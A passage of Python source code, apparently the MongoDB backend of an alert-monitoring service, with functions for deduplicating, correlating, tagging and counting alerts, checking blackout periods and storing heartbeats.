{'$group': {'_id': '$history.type', 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
for r in responses:
if r['count'] > count:
return True
return False
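    # Hedged usage sketch (not part of the original module): callers can tighten
    # or relax the flapping thresholds, e.g.
    #
    #     if backend.is_flapping(alert, window=300, count=5):
    #         ...  # treat the alert as noisy
    #
    # The calling pattern is illustrative; thresholds live outside this module.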
def dedup_alert(self, alert, history):
"""
Update alert status, service, value, text, timeout and rawData, increment duplicate count and set
repeat=True, and keep track of last receive id and time but don't append to history unless status changes.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'event': alert.event,
'severity': alert.severity,
'customer': alert.customer
}
now = datetime.utcnow()
update = {
'$set': {
'status': alert.status,
'service': alert.service,
'value': alert.value,
'text': alert.text,
'timeout': alert.timeout,
'rawData': alert.raw_data,
'repeat': True,
'lastReceiveId': alert.id,
'lastReceiveTime': now
},
'$addToSet': {'tags': {'$each': alert.tags}},
'$inc': {'duplicateCount': 1}
}
# only update those attributes that are specifically defined
attributes = {'attributes.' + k: v for k, v in alert.attributes.items()}
update['$set'].update(attributes)
if alert.update_time:
update['$set']['updateTime'] = alert.update_time
if history:
update['$push'] = {
'history': {
'$each': [history.serialize],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
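    # Hedged sketch (not part of the original module): for a duplicate alert the
    # update document assembled above looks roughly like
    #
    #     {'$set': {'status': ..., 'value': ..., 'attributes.region': 'eu-west-1'},
    #      '$addToSet': {'tags': {'$each': [...]}},
    #      '$inc': {'duplicateCount': 1},
    #      '$push': {'history': {...}}}   # only when a history entry is passed
    #
    # where 'attributes.region' stands in for any caller-supplied attribute key.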
def correlate_alert(self, alert, history):
"""
Update alert key attributes, reset duplicate count and set repeat=False, keep track of last
receive id and time, appending all to history. Append to history again if status changes.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event,
'severity': {'$ne': alert.severity}
},
{
'event': {'$ne': alert.event},
'correlate': alert.event
}],
'customer': alert.customer
}
update = {
'$set': {
'event': alert.event,
'severity': alert.severity,
'status': alert.status,
'service': alert.service,
'value': alert.value,
'text': alert.text,
'createTime': alert.create_time,
'timeout': alert.timeout,
'rawData': alert.raw_data,
'duplicateCount': alert.duplicate_count,
'repeat': alert.repeat,
'previousSeverity': alert.previous_severity,
'trendIndication': alert.trend_indication,
'receiveTime': alert.receive_time,
'lastReceiveId': alert.last_receive_id,
'lastReceiveTime': alert.last_receive_time
},
'$addToSet': {'tags': {'$each': alert.tags}},
'$push': {
'history': {
'$each': [h.serialize for h in history],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
# only update those attributes that are specifically defined
attributes = {'attributes.' + k: v for k, v in alert.attributes.items()}
update['$set'].update(attributes)
if alert.update_time:
update['$set']['updateTime'] = alert.update_time
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def create_alert(self, alert):
data = {
'_id': alert.id,
'resource': alert.resource,
'event': alert.event,
'environment': alert.environment,
'severity': alert.severity,
'correlate': alert.correlate,
'status': alert.status,
'service': alert.service,
'group': alert.group,
'value': alert.value,
'text': alert.text,
'tags': alert.tags,
'attributes': alert.attributes,
'origin': alert.origin,
'type': alert.event_type,
'createTime': alert.create_time,
'timeout': alert.timeout,
'rawData': alert.raw_data,
'customer': alert.customer,
'duplicateCount': alert.duplicate_count,
'repeat': alert.repeat,
'previousSeverity': alert.previous_severity,
'trendIndication': alert.trend_indication,
'receiveTime': alert.receive_time,
'lastReceiveId': alert.last_receive_id,
'lastReceiveTime': alert.last_receive_time,
'updateTime': alert.update_time,
'history': [h.serialize for h in alert.history]
}
if self.get_db().alerts.insert_one(data).inserted_id == alert.id:
return data
def set_alert(self, id, severity, status, tags, attributes, timeout, previous_severity, update_time, history=None):
query = {'_id': {'$regex': '^' + id}}
update = {
'$set': {
'severity': severity,
'status': status,
'attributes': attributes,
'timeout': timeout,
'previousSeverity': previous_severity,
'updateTime': update_time
},
'$addToSet': {'tags': {'$each': tags}},
'$push': {
'history': {
'$each': [h.serialize for h in history],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def get_alert(self, id, customers=None):
if len(id) == 8:
query = {'$or': [{'_id': {'$regex': '^' + id}}, {'lastReceiveId': {'$regex': '^' + id}}]}
else:
query = {'$or': [{'_id': id}, {'lastReceiveId': id}]}
if customers:
query['customer'] = {'$in': customers}
return self.get_db().alerts.find_one(query)
# STATUS, TAGS, ATTRIBUTES
def set_status(self, id, status, timeout, update_time, history=None):
"""
Set status and update history.
"""
query = {'_id': {'$regex': '^' + id}}
update = {
'$set': {'status': status, 'timeout': timeout, 'updateTime': update_time},
'$push': {
'history': {
'$each': [history.serialize],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def tag_alert(self, id, tags):
"""
Append tags to tag list. Don't add same tag more than once.
"""
response = self.get_db().alerts.update_one(
{'_id': {'$regex': '^' + id}}, {'$addToSet': {'tags': {'$each': tags}}})
return response.matched_count > 0
def untag_alert(self, id, tags):
"""
Remove tags from tag list.
"""
response = self.get_db().alerts.update_one({'_id': {'$regex': '^' + id}}, {'$pullAll': {'tags': tags}})
return response.matched_count > 0
def update_tags(self, id, tags):
response = self.get_db().alerts.update_one({'_id': {'$regex': '^' + id}}, update={'$set': {'tags': tags}})
return response.matched_count > 0
def update_attributes(self, id, old_attrs, new_attrs):
update = dict()
set_value = {'attributes.' + k: v for k, v in new_attrs.items() if v is not None}
if set_value:
update['$set'] = set_value
unset_value = {'attributes.' + k: v for k, v in new_attrs.items() if v is None}
if unset_value:
update['$unset'] = unset_value
if update:
return self.get_db().alerts.find_one_and_update(
{'_id': {'$regex': '^' + id}},
update=update,
return_document=ReturnDocument.AFTER
)['attributes']
return {}
def delete_alert(self, id):
response = self.get_db().alerts.delete_one({'_id': {'$regex': '^' + id}})
        return response.deleted_count == 1
# BULK
def tag_alerts(self, query=None, tags=None):
query = query or Query()
updated = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.update(query.where, {'$addToSet': {'tags': {'$each': tags}}})
return updated if response['n'] else []
def untag_alerts(self, query=None, tags=None):
query = query or Query()
updated = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.update(query.where, {'$pullAll': {'tags': tags}})
return updated if response['n'] else []
def update_attributes_by_query(self, query=None, attributes=None):
query = query or Query()
update = dict()
set_value = {'attributes.' + k: v for k, v in attributes.items() if v is not None}
if set_value:
update['$set'] = set_value
unset_value = {'attributes.' + k: v for k, v in attributes.items() if v is None}
if unset_value:
update['$unset'] = unset_value
updated = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.update_many(query.where, update=update)
return updated if response.matched_count > 0 else []
def delete_alerts(self, query=None):
query = query or Query()
deleted = list(self.get_db().alerts.find(query.where, projection={'_id': 1}))
response = self.get_db().alerts.remove(query.where)
return deleted if response['n'] else []
# SEARCH & HISTORY
def add_history(self, id, history):
query = {'_id': {'$regex': '^' + id}}
update = {
'$push': {
'history': {
'$each': [history.serialize],
'$slice': current_app.config['HISTORY_LIMIT'],
'$position': 0
}
}
}
return self.get_db().alerts.find_one_and_update(
query,
update=update,
return_document=ReturnDocument.AFTER
)
def get_alerts(self, query=None, raw_data=False, history=False, page=None, page_size=None):
query = query or Query()
fields = dict()
if not raw_data:
fields['rawData'] = 0
if not history:
fields['history'] = 0
pipeline = [
{'$lookup': {
'from': 'codes',
'localField': 'severity',
'foreignField': 'severity',
'as': 'fromCodes'
}},
{'$replaceRoot': {'newRoot': {'$mergeObjects': [{'$arrayElemAt': ['$fromCodes', 0]}, '$$ROOT']}}},
{'$project': {'fromCodes': 0}},
{'$lookup': {
'from': 'states',
'localField': 'status',
'foreignField': 'status',
'as': 'fromStates'
}},
{'$replaceRoot': {'newRoot': {'$mergeObjects': [{'$arrayElemAt': ['$fromStates', 0]}, '$$ROOT']}}},
{'$project': {'fromStates': 0}},
{'$match': query.where},
{'$project': fields},
{'$sort': {k: v for k, v in query.sort}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size}
]
return self.get_db().alerts.aggregate(pipeline)
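    # Hedged sketch (not part of the original module): the two $lookup stages
    # above merge the numeric severity "code" and status "state" into each
    # alert before filtering, so a query sort such as
    #
    #     sort=[('code', 1), ('lastReceiveTime', -1)]
    #
    # orders alerts by severity rank; the sort specification is illustrative.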
def get_alert_history(self, alert, page=None, page_size=None):
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event
},
{
'correlate': alert.event,
}
],
'customer': alert.customer
}
fields = {
'resource': 1,
'event': 1,
'environment': 1,
'customer': 1,
'service': 1,
'group': 1,
'tags': 1,
'attributes': 1,
'origin': 1,
'type': 1,
'history': 1
}
pipeline = [
{'$unwind': '$history'},
{'$match': query},
{'$project': fields},
{'$sort': {'history.updateTime': -1}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size},
]
responses = self.get_db().alerts.aggregate(pipeline)
history = list()
for response in responses:
history.append(
{
'id': response['history']['id'],
'resource': response['resource'],
'event': response['history'].get('event'),
'environment': response['environment'],
'severity': response['history'].get('severity'),
'service': response['service'],
'status': response['history'].get('status'),
'group': response['group'],
'value': response['history'].get('value'),
'text': response['history'].get('text'),
'tags': response['tags'],
'attributes': response['attributes'],
'origin': response['origin'],
'updateTime': response['history']['updateTime'],
'user': response['history'].get('user'),
'timeout': response['history'].get('timeout'),
'type': response['history'].get('type', 'unknown'),
'customer': response.get('customer')
}
)
return history
def get_history(self, query=None, page=None, page_size=None):
query = query or Query()
fields = {
'resource': 1,
'event': 1,
'environment': 1,
'customer': 1,
'service': 1,
'group': 1,
'tags': 1,
'attributes': 1,
'origin': 1,
'user': 1,
'timeout': 1,
'type': 1,
'history': 1
}
pipeline = [
{'$unwind': '$history'},
{'$match': query.where},
{'$project': fields},
{'$sort': {'history.updateTime': -1}},
{'$skip': (page - 1) * page_size},
{'$limit': page_size},
]
responses = self.get_db().alerts.aggregate(pipeline)
history = list()
for response in responses:
history.append(
{
'id': response['history']['id'],
'resource': response['resource'],
'event': response['history']['event'],
'environment': response['environment'],
'severity': response['history']['severity'],
'service': response['service'],
'status': response['history']['status'],
'group': response['group'],
'value': response['history']['value'],
'text': response['history']['text'],
'tags': response['tags'],
'attributes': response['attributes'],
'origin': response['origin'],
'updateTime': response['history']['updateTime'],
'user': response.get('user'),
'timeout': response.get('timeout'),
'type': response['history'].get('type', 'unknown'),
'customer': response.get('customer', None)
}
)
return history
# COUNTS
def get_count(self, query=None):
"""
Return total number of alerts that meet the query filter.
"""
query = query or Query()
return self.get_db().alerts.count_documents(query.where)
def get_counts(self, query=None, group=None):
query = query or Query()
if group is None:
raise ValueError('Must define a group')
pipeline = [
{'$match': query.where},
{'$project': {group: 1}},
{'$group': {'_id': '$' + group, 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
counts = dict()
for response in responses:
counts[response['_id']] = response['count']
return counts
def get_counts_by_severity(self, query=None):
query = query or Query()
return self.get_counts(query, group='severity')
def get_counts_by_status(self, query=None):
query = query or Query()
return self.get_counts(query, group='status')
def get_topn_count(self, query=None, group='event', topn=100):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$service'},
{
'$group': {
'_id': f'${group}',
'count': {'$sum': 1},
'duplicateCount': {'$sum': '$duplicateCount'},
'environments': {'$addToSet': '$environment'},
'services': {'$addToSet': '$service'},
'resources': {'$addToSet': {'id': '$_id', 'resource': '$resource'}}
}
},
{'$sort': {'count': -1, 'duplicateCount': -1}},
{'$limit': topn}
]
responses = self.get_db().alerts.aggregate(pipeline, allowDiskUse=True)
top = list()
for response in responses:
top.append(
{
f'{group}': response['_id'],
'environments': response['environments'],
'services': response['services'],
'resources': response['resources'],
'count': response['count'],
'duplicateCount': response['duplicateCount']
}
)
return top
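    # Hedged sketch (not part of the original module): each element returned
    # above has the shape
    #
    #     {'event': 'DiskFull', 'environments': ['Production'], 'services': ['Web'],
    #      'resources': [{'id': ..., 'resource': ...}], 'count': 42,
    #      'duplicateCount': 7}
    #
    # with the first key named after "group"; the concrete values are illustrative.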
def get_topn_flapping(self, query=None, group='event', topn=100):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$service'},
{'$unwind': '$history'},
{'$match': {'history.type': 'severity'}},
{
'$group': {
'_id': f'${group}',
'count': {'$sum': 1},
'duplicateCount': {'$max': '$duplicateCount'},
'environments': {'$addToSet': '$environment'},
'services': {'$addToSet': '$service'},
'resources': {'$addToSet': {'id': '$_id', 'resource': '$resource'}}
}
},
{'$sort': {'count': -1, 'duplicateCount': -1}},
{'$limit': topn}
]
responses = self.get_db().alerts.aggregate(pipeline, allowDiskUse=True)
top = list()
for response in responses:
top.append(
{
f'{group}': response['_id'],
'environments': response['environments'],
'services': response['services'],
'resources': response['resources'],
'count': response['count'],
'duplicateCount': response['duplicateCount']
}
)
return top
def get_topn_standing(self, query=None, group='event', topn=100):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$service'},
{
'$group': {
'_id': f'${group}',
'count': {'$sum': 1},
'duplicateCount': {'$sum': '$duplicateCount'},
'lifeTime': {'$sum': {'$subtract': ['$lastReceiveTime', '$createTime']}},
'environments': {'$addToSet': '$environment'},
'services': {'$addToSet': '$service'},
'resources': {'$addToSet': {'id': '$_id', 'resource': '$resource'}}
}
},
{'$sort': {'lifeTime': -1, 'duplicateCount': -1}},
{'$limit': topn}
]
responses = self.get_db().alerts.aggregate(pipeline, allowDiskUse=True)
top = list()
for response in responses:
top.append(
{
f'{group}': response['_id'],
'environments': response['environments'],
'services': response['services'],
'resources': response['resources'],
'count': response['count'],
'duplicateCount': response['duplicateCount']
}
)
return top
# ENVIRONMENTS
def get_environments(self, query=None, topn=1000):
query = query or Query()
def pipeline(group_by):
return [
{'$match': query.where},
{'$project': {'environment': 1, group_by: 1}},
{'$group':
{
'_id': {'environment': '$environment', group_by: '$' + group_by},
'count': {'$sum': 1}
}
},
{'$limit': topn}
]
response_severity = self.get_db().alerts.aggregate(pipeline('severity'))
severity_count = defaultdict(list)
for r in response_severity:
severity_count[r['_id']['environment']].append((r['_id']['severity'], r['count']))
response_status = self.get_db().alerts.aggregate(pipeline('status'))
status_count = defaultdict(list)
for r in response_status:
status_count[r['_id']['environment']].append((r['_id']['status'], r['count']))
environments = self.get_db().alerts.find().distinct('environment')
return [
{
'environment': env,
'severityCounts': dict(severity_count[env]),
'statusCounts': dict(status_count[env]),
'count': sum(t[1] for t in severity_count[env])
} for env in environments]
# SERVICES
def get_services(self, query=None, topn=1000):
query = query or Query()
def pipeline(group_by):
return [
{'$unwind': '$service'},
{'$match': query.where},
{'$project': {'environment': 1, 'service': 1, group_by: 1}},
{'$group':
{
'_id': {'environment': '$environment', 'service': '$service', group_by: '$' + group_by},
'count': {'$sum': 1}
}
},
{'$limit': topn}
]
response_severity = self.get_db().alerts.aggregate(pipeline('severity'))
severity_count = defaultdict(list)
for r in response_severity:
severity_count[(r['_id']['environment'], r['_id']['service'])].append((r['_id']['severity'], r['count']))
response_status = self.get_db().alerts.aggregate(pipeline('status'))
status_count = defaultdict(list)
for r in response_status:
status_count[(r['_id']['environment'], r['_id']['service'])].append((r['_id']['status'], r['count']))
pipeline = [
{'$unwind': '$service'},
{'$group': {'_id': {'environment': '$environment', 'service': '$service'}}},
{'$limit': topn}
]
services = list(self.get_db().alerts.aggregate(pipeline))
return [
{
'environment': svc['_id']['environment'],
'service': svc['_id']['service'],
'severityCounts': dict(severity_count[(svc['_id']['environment'], svc['_id']['service'])]),
'statusCounts': dict(status_count[(svc['_id']['environment'], svc['_id']['service'])]),
'count': sum(t[1] for t in severity_count[(svc['_id']['environment'], svc['_id']['service'])])
} for svc in services]
# ALERT GROUPS
def get_alert_groups(self, query=None, topn=1000):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$project': {'environment': 1, 'group': 1}},
{'$limit': topn},
{'$group': {'_id': {'environment': '$environment', 'group': '$group'}, 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
groups = list()
for response in responses:
groups.append(
{
'environment': response['_id']['environment'],
'group': response['_id']['group'],
'count': response['count']
}
)
return groups
# ALERT TAGS
def get_alert_tags(self, query=None, topn=1000):
query = query or Query()
pipeline = [
{'$match': query.where},
{'$unwind': '$tags'},
{'$project': {'environment': 1, 'tags': 1}},
{'$limit': topn},
{'$group': {'_id': {'environment': '$environment', 'tag': '$tags'}, 'count': {'$sum': 1}}}
]
responses = self.get_db().alerts.aggregate(pipeline)
tags = list()
for response in responses:
tags.append(
{
'environment': response['_id']['environment'],
'tag': response['_id']['tag'],
'count': response['count']
}
)
return tags
# BLACKOUTS
def create_blackout(self, blackout):
data = {
'_id': blackout.id,
'priority': blackout.priority,
'environment': blackout.environment,
'startTime': blackout.start_time,
'endTime': blackout.end_time,
'duration': blackout.duration,
'user': blackout.user,
'createTime': blackout.create_time,
'text': blackout.text,
}
if blackout.service:
data['service'] = blackout.service
if blackout.resource:
data['resource'] = blackout.resource
if blackout.event:
data['event'] = blackout.event
if blackout.group:
data['group'] = blackout.group
if blackout.tags:
data['tags'] = blackout.tags
if blackout.origin:
data['origin'] = blackout.origin
if blackout.customer:
data['customer'] = blackout.customer
if self.get_db().blackouts.insert_one(data).inserted_id == blackout.id:
return data
def get_blackout(self, id, customers=None):
query = {'_id': id}
if customers:
query['customer'] = {'$in': customers}
return self.get_db().blackouts.find_one(query)
def get_blackouts(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().blackouts.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_blackouts_count(self, query=None):
query = query or Query()
return self.get_db().blackouts.count_documents(query.where)
def is_blackout_period(self, alert):
query = dict()
query['startTime'] = {'$lte': alert.create_time}
query['endTime'] = {'$gt': alert.create_time}
query['environment'] = alert.environment
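        # The '$or' below enumerates every combination of the six blackout scoping
        # attributes (resource, service, event, group, tags, origin) being either
        # unset (None) or matching the alert, so a blackout applies when all of the
        # attributes it does define match. For the list-valued 'service' and 'tags'
        # fields, {'$not': {'$elemMatch': {'$nin': [...]}}} requires every element
        # of the blackout list to be present in the alert's list.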
query['$and'] = [{'$or': [
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': None, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': None, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': None, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': None, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': None, 'origin': alert.origin},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': None},
{'resource': alert.resource, 'service': {'$not': {'$elemMatch': {'$nin': alert.service}}}, 'event': alert.event, 'group': alert.group, 'tags': {'$not': {'$elemMatch': {'$nin': alert.tags}}}, 'origin': alert.origin},
]}]
if current_app.config['CUSTOMER_VIEWS']:
query['$and'].append({'$or': [{'customer': None}, {'customer': alert.customer}]})
if self.get_db().blackouts.find_one(query):
return True
return False
def update_blackout(self, id, **kwargs):
return self.get_db().blackouts.find_one_and_update(
{'_id': id},
update={'$set': kwargs},
return_document=ReturnDocument.AFTER
)
def delete_blackout(self, id):
response = self.get_db().blackouts.delete_one({'_id': id})
        return response.deleted_count == 1
# HEARTBEATS
def upsert_heartbeat(self, heartbeat):
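        # Heartbeats are keyed on (origin, customer): an existing document is
        # updated in place, while '$setOnInsert' assigns the id only when a new
        # document is created.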
return self.get_db().heartbeats.find_one_and_update(
{
'origin': heartbeat.origin,
'customer': heartbeat.customer
},
{
'$setOnInsert': {
'_id': heartbeat.id
},
'$set': {
'origin': heartbeat.origin,
'tags': heartbeat.tags,
'attributes': heartbeat.attributes,
'type': heartbeat.event_type,
'createTime': heartbeat.create_time,
'timeout': heartbeat.timeout,
'receiveTime': heartbeat.receive_time,
'customer': heartbeat.customer
}
},
upsert=True,
return_document=ReturnDocument.AFTER
)
def get_heartbeat(self, id, customers=None):
if len(id) == 8:
query = {'_id': {'$regex': '^' + id}}
else:
query = {'_id': id}
if customers:
query['customer'] = {'$in': customers}
return self.get_db().heartbeats.find_one(query)
def get_heartbeats(self, query=None, page=None, page_size=None):
query = query or Query()
return self.get_db().heartbeats.find(query.where, sort=query.sort).skip((page - 1) * page_size).limit(page_size)
def get_heartbeats_by_status(self, status=None, query=None, page=None, page_size=None):
status = status or list()
query = query or Query()
max_latency = current_app.config['HEARTBEAT_MAX_LATENCY']
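        # Derive status server-side: 'isExpired' is true when the time since the
        # last receiveTime exceeds the heartbeat timeout (converted to ms), and
        # 'isSlow' when the receive latency (receiveTime - createTime) exceeds
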